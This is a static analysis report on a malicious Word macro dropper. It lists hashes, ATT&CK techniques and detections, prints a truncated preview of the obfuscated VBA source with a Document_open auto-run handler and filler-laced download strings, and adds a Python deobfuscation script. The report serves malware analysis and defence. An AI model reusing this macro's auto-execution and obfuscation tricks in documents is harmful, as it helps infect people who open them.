Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b01c6495ef175bc3…

MALICIOUS

Office (OLE)

Size: 134.5 KB
Created: 2018-04-24 20:36:00
Authoring application: Microsoft Office Word
First seen: 2019-01-20
MD5: a529e075378e304f7dd35672a3a242e2
SHA-1: 9e30f8f6c1887d5801811ead916ca059d0bd4074
SHA-256: b01c6495ef175bc35fc0e24ec7a5b094ef3c376b3073f3de24be4662affb787b
Risk score: 182

Malware Insights

MITRE ATT&CK
  • T1566.001 Phishing: Spearphishing Attachment
  • T1059 Command and Scripting Interpreter
  • T1059.005 Command and Scripting Interpreter: Visual Basic

The sample is a malicious Office (OLE) document carrying VBA macros. The macro module defines a 'Document_open' handler, so the code runs as soon as the document is opened with macros enabled, and the 'Shell()' call flagged by the OLE_VBA_SHELL heuristic gives it a way to execute arbitrary commands. The ClamAV detection 'Doc.Dropper.Agent-6517626-0' is consistent with a dropper. The VBA is heavily obfuscated: every routine is padded with dead arithmetic over undefined variables (kept from raising by 'On Error Resume Next'), and the real payload is assembled from string literals passed through a helper routine ('BilzOM') whose arguments are laced with repeated filler tokens such as "hOm+hOm" and "'+'". Once that filler is removed, the literals expose fragments such as "et.WebClient", "nsadasd.next(10000, 282133)" and, after a second filler ("alu") is dropped, "DownloadFile" and "ToString", which is the shape of a script stage that fetches and executes a secondary payload. That download behaviour is inferred from the strings; this is a static result and no network activity was observed here.

Heuristics (5)

  • ClamAV: Doc.Dropper.Agent-6517626-0 [critical; CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Dropper.Agent-6517626-0
  • VBA macros detected [medium; 2 related findings; OLE_VBA_MACROS]
    Document contains VBA macro code
  • Shell() call in VBA [critical; OLE_VBA_SHELL]
    The macro code calls Shell(), which executes an arbitrary command line
  • Document_Open macro [high; OLE_VBA_DOCOPEN]
    An auto-executing Document_Open handler is present
  • Embedded URL [info; EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    This is the standard DrawingML XML namespace URI that ordinary Office files embed; it is not an indicator of compromise and should not be treated as a download or C2 address.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename   | Kind      | Source                                              | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 37033 bytes
SHA-256: 740f405b0d643737580e1c9d30ed0cfc438db5cb92dc32dff87bfe76ff8daaf6
Preview of the extracted script (first 1,000 lines)
Attribute VB_Name = "VQwaiTtO"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub TkhOV(wOFNY)
LNafW = 78046 * JmhaN + 73783 * ChrB(25085 * Rnd(74991) - 19313 + wqAAC) - 93812 - Rnd(tTzYQ) + 38626 - TcVaH * 42005 * Chr(ShdDhm)
End Sub
Sub TcIio(IWXEJ)
MmCqs = 87126 * KHlQm + 61373 * ChrB(77307 * Rnd(49000) - 58111 + XzVKE) - 50002 - Rnd(ppcKNw) + 10404 - QqJtP * 81423 * Chr(JObCiL)
CzjiN = 99933 * oGIML + 1933 * ChrB(4492 * Rnd(33126) - 14484 + KfzVpf) - 60598 - Rnd(TmnGi) + 3553 - jUncbj * 68904 * Chr(JckAh)
pisHf = 85089 * LzNUE + 30190 * ChrB(88391 * Rnd(26353) - 38215 + XGUijO) - 78810 - Rnd(NaaqtE) + 58183 - KdDvzD * 18463 * Chr(UUaHWT)
End Sub
Sub rptMuN(ITDaS)
cUFIq = 12619 * QKYjU + 94072 * ChrB(59512 * Rnd(19050) - 23349 + hJtkiB) - 99485 - Rnd(jkkVjr) + 46735 - rNzORQ * 31065 * Chr(ZhQKs)
iPwfWQ = 47708 * tTGQGW + 41299 * ChrB(89975 * Rnd(51461) - 64297 + jFRKz) - 43580 - Rnd(tiKAk) + 79035 - mBUYEV * 14249 * Chr(KTfIB)
End Sub
Private Sub Document_open()
On Error Resume Next
tsiGj = 99308 * sQFwI + 10450 * ChrB(44674 * Rnd(88138) - 43313 + jRQTUB) - 42119 - Rnd(MDWuw) + 57866 - UGzmfu * 2171 * Chr(rulOZv)
RiizZwrm (kSnaw + ZudELpa + lqZrJk)
wmzRb = 19438 * zXHqwi + 53147 * ChrB(48391 * Rnd(49107) - 68074 + wawTEG) - 46743 - Rnd(zjPauW) + 19370 - tEwTmP * 15203 * Chr(MKzbN)
End Sub
Sub MQpEN(bchqt)
MEjwMU = 77915 * iUcQA + 61981 * ChrB(36392 * Rnd(60245) - 12821 + JwThWz) - 70200 - Rnd(JACQXG) + 48972 - DDhPwd * 75484 * Chr(hsoZE)
qvVohz = 50420 * hkMWKn + 3083 * ChrB(33598 * Rnd(94192) - 43285 + IdPzqv) - 62202 - Rnd(KAiKK) + 72817 - KHuiYc * 34966 * Chr(VzDbS)
HQvRiw = 7219 * zftAnP + 59424 * ChrB(6494 * Rnd(49066) - 3208 + hduWOz) - 27827 - Rnd(EuAnUN) + 18985 - jjtbp * 48155 * Chr(JPpXoC)
End Sub
Sub SXBqlV(thUUG)
jzrZnd = 24970 * UjZvIu + 71422 * ChrB(13435 * Rnd(47807) - 49281 + nLbcl) - 57918 - Rnd(opqCYH) + 68108 - CLYQkK * 79776 * Chr(zrbucb)
End Sub
Sub mIuuSn(UFuKp)
ESHSL = 66028 * ZiIoPz + 25685 * ChrB(57724 * Rnd(72456) - 19445 + zMNEti) - 25090 - Rnd(nzrSV) + 49365 - RufjJ * 66946 * Chr(jDDzFi)
ZaivL = 21617 * KAYdFv + 90803 * ChrB(88749 * Rnd(64469) - 30813 + PujTwB) - 981 - Rnd(FcKAu) + 47976 - vNWIXJ * 27754 * Chr(HtHGEn)
End Sub

Attribute VB_Name = "pVnMqkoGcjuKFA"
Sub zdEXz(XYsdAD)
ZqvwN = 12277 * oMhiwG + 13364 * ChrB(88604 * Rnd(54225) - 54760 + IqHudC) - 63962 - Rnd(RSwujp) + 62105 - jmlwz * 98855 * Chr(LmwVZ)
End Sub
Function ZudELpa()
On Error Resume Next
GBulj = 92890 * CzIqv + 14768 * ChrB(46989 * Rnd(82964) - 89220 + oCAfoX) - 62943 - Rnd(wusDiv) + 53072 - rFUKJY * 39612 * Chr(zGmoH)
SNiWGwcAh = BilzOM("zNa1%UshO'+'mDChOm+hOmX){'+'try{7wzYYUhOm+hOm.ms6DoahOm+hOmlhOm+hOmuWnlalhOm+hOmuOahOm+hOmdFhOm+hOmIalulehOm+hOmms6hOm+hOm(7wzasfc'+'.mhOm+hOmshOm+hOm6ToShOm+hOmtraluialuNgms6hOm+EW", knLaL - knLaL + 8 + knLaL - knLaL, knLaL - knLaL + 172 + knLaL - knLaL)
vJWlw = 75210 * dRdNwh + 3099 * ChrB(62337 * Rnd(97800) - 41344 + PSQSW) - 69487 - Rnd(Phjhil) + 84244 - qzjhtw * 77861 * Chr(NnqwMq)
zrOlbh = 26124 * awCBnB + 37236 * ChrB(74153 * Rnd(17794) - 49681 + zaJtzE) - 32107 - Rnd(WZFlr) + 23454 - NHqDWY * 70517 * Chr(hsSLzi)
dSMHWYq = BilzOM("NzN+hOmchOm+vHR%D", nwlZZ - nwlZZ + 4 + nwlZZ - nwlZZ, nwlZZ - nwlZZ + 9 + nwlZZ - nwlZZ)
kkFHXG = 75990 * PhKOrF + 40796 * ChrB(23492 * Rnd(20890) - 79118 + oMvFD) - 35965 - Rnd(jcBjs) + 33263 - lpUjjo * 42122 * Chr(JbWLK)
qArcC = 49993 * fcDUr + 98693 * ChrB(59671 * Rnd(44129) - 83779 + uWNlaS) - 68569 - Rnd(MCIvGB) + 427 - wHbirs * 67546 * Chr(LwrHT)
VdShuf = BilzOM("Rwm+hOmet.hOm+hOmWebClhOm+hOmient;hOm+hOm7whOm+hOmz'+'NhOm+hOmSB = 7hOm+'+'hOmwhOm+hOmznsadasd.nhOm+hOmext(10000, hOm+hOm282133);7wzA'+'DhOm+hOmCXhO'+'m+hOm = cl4 hOm+hOm hthOm+hUZ9NSq", lMfIWn - lMfIWn + 3 + lMfIWn - lMfIWn, lMfIWn - lMfIWn + 176 + lMfIWn - lMfIWn)
kEAiP = 57597 * mPhHw + 80136 * ChrB(45378 * Rnd(31708) - 70060 + CUrAX) - 914
... (truncated)
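The filler patterns visible in the preview above can be checked mechanically rather than by eye. The following Python script is an added example and is not part of this report or of the tooling that produced it. It takes a short excerpt copied from the macros.bas preview (embedded inline as constructed input), drops the dead-arithmetic padding lines, pulls the string literal out of each BilzOM(...) call, strips the repeating filler tokens, and lists which defined routine references which, so the Document_open to ZudELpa chain becomes visible. The filler tokens ("'+'", "hOm+hOm", "alu") and the "7wz" to "$" substitution are inferences drawn from their repetition in the literals, not a decoding of what BilzOM actually does; they are marked as assumptions in the code and the second-layer output is labelled a guess.

```python
import re

# Constructed input: a short excerpt copied from the macros.bas preview on this page.
MACRO_EXCERPT = r"""Private Sub Document_open()
On Error Resume Next
tsiGj = 99308 * sQFwI + 10450 * ChrB(44674 * Rnd(88138) - 43313 + jRQTUB) - 42119 - Rnd(MDWuw) + 57866 - UGzmfu * 2171 * Chr(rulOZv)
RiizZwrm (kSnaw + ZudELpa + lqZrJk)
wmzRb = 19438 * zXHqwi + 53147 * ChrB(48391 * Rnd(49107) - 68074 + wawTEG) - 46743 - Rnd(zjPauW) + 19370 - tEwTmP * 15203 * Chr(MKzbN)
End Sub
Function ZudELpa()
On Error Resume Next
GBulj = 92890 * CzIqv + 14768 * ChrB(46989 * Rnd(82964) - 89220 + oCAfoX) - 62943 - Rnd(wusDiv) + 53072 - rFUKJY * 39612 * Chr(zGmoH)
SNiWGwcAh = BilzOM("zNa1%UshO'+'mDChOm+hOmX){'+'try{7wzYYUhOm+hOm.ms6DoahOm+hOmlhOm+hOmuWnlalhOm+hOmuOahOm+hOmdFhOm+hOmIalulehOm+hOmms6hOm+hOm(7wzasfc'+'.mhOm+hOmshOm+hOm6ToShOm+hOmtraluialuNgms6hOm+EW", knLaL - knLaL + 8 + knLaL - knLaL, knLaL - knLaL + 172 + knLaL - knLaL)
VdShuf = BilzOM("Rwm+hOmet.hOm+hOmWebClhOm+hOmient;hOm+hOm7whOm+hOmz'+'NhOm+hOmSB = 7hOm+'+'hOmwhOm+hOmznsadasd.nhOm+hOmext(10000, hOm+hOm282133);7wzA'+'DhOm+hOmCXhO'+'m+hOm = cl4 hOm+hOm hthOm+hUZ9NSq", lMfIWn - lMfIWn + 3 + lMfIWn - lMfIWn, lMfIWn - lMfIWn + 176 + lMfIWn - lMfIWn)
End Function
"""

# Dead padding: `name = N * undefined + N * ChrB(... Rnd(...) ...) ... Chr(undefined)`.
# With `On Error Resume Next` in force these lines never raise and never affect control flow.
JUNK_LINE = re.compile(
    r"^\s*\w+\s*=\s*\d+\s*\*\s*\w+\s*\+\s*\d+\s*\*\s*ChrB\(.*Rnd\(.*Chr\(\w+\)\s*$"
)
STRING_ARG = re.compile(r'BilzOM\("([^"]*)"')
ROUTINE = re.compile(r"^(?:Private |Public )?(?:Sub|Function)\s+(\w+)")

# ASSUMPTION: these tokens recur throughout the literals and are treated as filler.
# "'+'" is removed first because it sometimes splits a "hOm+hOm" into two halves.
FILLER = ("'+'", "hOm+hOm")
# ASSUMPTION: a second filler that only becomes visible once the first layer is gone.
SECOND_FILLER = ("alu",)
# ASSUMPTION: "7wz" prefixes identifiers (7wzNSB, 7wznsadasd, 7wzADCX) the way "$" does in PowerShell.
GUESSED_SUBS = {"7wz": "$"}


def strip_junk(vba_src):
    """Return the non-empty lines that are not dead arithmetic padding."""
    return [ln for ln in vba_src.splitlines() if ln.strip() and not JUNK_LINE.match(ln)]


def strip_filler(s, tokens):
    """Delete each filler token, in the given order, from a string literal."""
    for tok in tokens:
        s = s.replace(tok, "")
    return s


def extract_strings(vba_src):
    """Literal first argument of every BilzOM(...) call, first-layer filler removed."""
    return [strip_filler(lit, FILLER) for lit in STRING_ARG.findall(vba_src)]


def guess_plaintext(s):
    """Apply the second-layer guesses. The result is a hypothesis, not decoded BilzOM output."""
    s = strip_filler(s, SECOND_FILLER)
    for old, new in GUESSED_SUBS.items():
        s = s.replace(old, new)
    return s


def call_edges(lines):
    """Map each Sub/Function name to the set of other defined routines its body names."""
    names = {m.group(1) for ln in lines for m in [ROUTINE.match(ln)] if m}
    edges, current = {}, None
    for ln in lines:
        m = ROUTINE.match(ln)
        if m:
            current = m.group(1)
            edges[current] = set()
        elif ln.strip().startswith("End "):
            current = None
        elif current:
            edges[current] |= {n for n in names
                               if n != current and re.search(r"\b%s\b" % re.escape(n), ln)}
    return edges


if __name__ == "__main__":
    kept = strip_junk(MACRO_EXCERPT)
    print("\n".join(kept))
    print(call_edges(kept))
    for lit in extract_strings(MACRO_EXCERPT):
        print(lit)
        print("  guess:", guess_plaintext(lit))
```

Running it reduces the twelve-line excerpt to nine live lines, reports that Document_open names ZudELpa, and turns the second literal into "…et.WebClient;7wzNSB = 7wznsadasd.next(10000, 282133);7wzADCX = …", which the guessed substitution renders as "$NSB = $nsadasd.next(10000, 282133);$ADCX". The same approach is worth repeating on the full 37033-byte macros.bas once the remaining literals are available, since the Shell() call itself falls outside the preview shown here.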